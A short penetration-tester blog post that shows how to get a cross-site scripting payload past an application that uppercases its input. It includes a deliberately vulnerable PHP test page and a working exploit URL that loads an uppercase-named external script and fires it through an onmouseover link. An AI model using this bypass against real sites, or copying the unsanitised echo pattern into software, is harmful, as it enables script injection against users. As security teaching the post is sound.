thinking sideways

Had an interesting question posed to me today. A web application was using portions of the GET request to create content on a page, and not properly sanitising the input. The result was a web page that was potentially vulnerable to cross-site scripting (XSS). However, there was a catch. The application, while not checking for security risks, was converting the GET request parameters to all uppercase.

This meant that, since javascript is case sensitive, the usual methods wouldn’t work For example you couldn’t use document.write(), or alert(), because they were rendered as DOCUMENT.WRITE() or ALERT() instead.

Here’s a quick and dirty PHP script I wrote that mimics this behaviour (note that you will need to have GPC_MAGIC_QUOTES turned off in the php.ini for this to work)

<?php
   echo '<form name="testform" method="post">';
   echo '<select name="test">';
   if (isset($_GET['options']) ) {
      echo strtoupper($_GET['options']);
   } else {
      echo '<option value="empty">EMPTY</option>';
   }
   echo '</select>';
   echo '<input type="submit" name="submit" value="submit" />';
   echo '</form>';
?>

To test it out, simply browse to http://yourhost.yourdomain/test.php?options=uppercaseftw

So, the question as a pen tester is, how can I break this?

Turns out the answer is pretty simple: you simply make your own javascript file, host it on a server somewhere, give it an uppercase file name, and create functions with uppercase names.

For example, I created the following XSS() function, in a file named XSS.JS:

function XSS() {
   alert('xss'); // or whatever
}

Now, I need to load this code into the page I’m requesting, and then somehow call the XSS() function. I did this by closing the select tag in my options GET parameter, and providing my own script tag. I then created a link to “foo”, and set an onMouseOver event to call the XSS() function.

Here’s what the request URL looks like to exploit this code:

http://localhost/sandbox/index.php?options=<option value="number1">number1</option></select><script language="javascript" src="XSS.JS"></script><a href="foo" onmouseover="XSS()">clicky</a>   <!--

The result is a nice link that, upon placing the mouse over it, triggers the javascript event which fires off the usual alert box.

The source code of the resulting page looks like this:

<form name="testform" method="post">
<select name="test">
<OPTION VALUE="NUMBER1">NUMBER1</OPTION>
</SELECT>
<SCRIPT LANGUAGE="JAVASCRIPT" SRC="XSS.JS"></SCRIPT>
<A HREF="FOO" ONMOUSEOVER="XSS()">CLICKY</A>
<!--</select>
<input type="submit" name="submit" value="submit" />
</form>

Nothing particularly awesome about this, but it was a situation I’d not come across before, and it took me a minute to figure out a way around it. So I thought I’d share =)